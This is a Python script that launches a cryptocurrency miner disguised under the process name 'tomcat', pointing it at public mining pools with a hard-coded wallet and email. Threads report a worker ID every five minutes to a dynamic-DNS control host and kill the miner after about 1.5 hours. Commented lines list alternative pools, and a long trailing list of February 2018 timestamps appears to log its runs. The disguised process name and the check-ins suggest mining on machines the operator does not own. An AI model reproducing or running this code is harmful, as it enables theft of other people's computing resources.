import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:07.542230
#2018-02-17 16:14:01.800290
#2018-02-17 18:02:01.860751
#2018-02-17 19:48:05.555343
#2018-02-17 21:37:01.680650
#2018-02-17 23:21:01.650716
#2018-02-18 01:09:01.815775
#2018-02-18 02:57:02.122483
#2018-02-18 04:47:05.394907
#2018-02-18 06:39:06.150569
#2018-02-18 08:28:07.264903
#2018-02-18 10:16:02.045786
#2018-02-18 12:02:06.944899
#2018-02-18 13:47:06.092275
#2018-02-18 15:39:04.297874
#2018-02-18 17:28:08.091623
#2018-02-18 19:16:01.346830
#2018-02-18 21:02:06.941642
#2018-02-18 22:47:06.484399
#2018-02-19 00:37:05.951582
#2018-02-19 02:23:01.268767
#2018-02-19 04:10:01.494926
#2018-02-19 05:54:06.778951
#2018-02-19 07:44:06.635312
#2018-02-19 09:33:08.528534
#2018-02-19 11:23:08.240401
#2018-02-19 13:10:09.431772
#2018-02-19 14:59:01.846500
#2018-02-19 16:48:06.380221
#2018-02-19 18:34:08.308372
#2018-02-19 20:20:08.226605
#2018-02-19 22:09:06.726129
#2018-02-19 23:56:06.767379
#2018-02-20 01:43:06.532630
#2018-02-20 03:31:04.259505
#2018-02-20 05:18:01.408081
#2018-02-20 07:01:06.515458
#2018-02-20 08:47:04.179744
#2018-02-20 10:31:04.979111
#2018-02-20 12:15:11.671146
#2018-02-20 14:04:06.596576
#2018-02-20 15:48:07.608593
#2018-02-20 17:35:05.386093
#2018-02-20 19:22:06.181097
#2018-02-20 21:11:07.120716
#2018-02-20 22:57:07.595165
#2018-02-21 00:39:07.421452
#2018-02-21 02:25:05.843558
#2018-02-21 04:13:04.683231
#2018-02-21 06:01:06.125914
#2018-02-21 07:49:01.749278
#2018-02-21 09:35:09.912964
#2018-02-21 11:25:04.483883
#2018-02-21 13:14:06.154278
#2018-02-21 15:00:08.157274
#2018-02-21 16:51:10.399987
#2018-02-21 18:40:09.100955
#2018-02-21 20:25:04.861885
#2018-02-21 22:14:08.516816
#2018-02-22 00:03:08.646134
#2018-02-22 01:50:07.422047
#2018-02-22 03:37:07.476824
#2018-02-22 05:24:02.012313
#2018-02-22 07:09:03.685723
#2018-02-22 08:55:06.398059
#2018-02-22 10:43:01.930718
#2018-02-22 12:29:07.777734
#2018-02-22 14:15:10.185427
#2018-02-22 16:03:06.244541
#2018-02-22 17:50:07.466541
#2018-02-22 19:39:05.130053
#2018-02-22 21:31:01.276511
#2018-02-22 23:18:04.219378
#2018-02-23 01:04:03.980964
#2018-02-23 02:51:07.514565
#2018-02-23 04:39:04.202629
#2018-02-23 06:25:07.207316
#2018-02-23 08:12:02.030656
#2018-02-23 10:26:05.807182
#2018-02-23 12:20:09.635429
#2018-02-23 14:09:08.883629
#2018-02-23 15:59:01.528189
#2018-02-23 17:43:11.692548
#2018-02-23 19:31:03.656972
#2018-02-23 21:14:04.513206
#2018-02-23 23:01:08.922970
#2018-02-24 00:48:07.477548
#2018-02-24 02:36:04.982146
#2018-02-24 04:29:05.599460
#2018-02-24 06:15:03.720294
#2018-02-24 08:03:01.388362
#2018-02-24 09:46:03.543146
#2018-02-24 11:41:03.672982
#2018-02-24 13:32:02.076981
#2018-02-24 15:19:03.949242
#2018-02-24 17:08:07.160143
#2018-02-24 18:59:07.448278
#2018-02-24 20:46:01.886046
#2018-02-24 23:01:04.827113
#2018-02-25 02:18:06.746842
#2018-02-25 05:43:07.162898
#2018-02-25 11:37:07.727782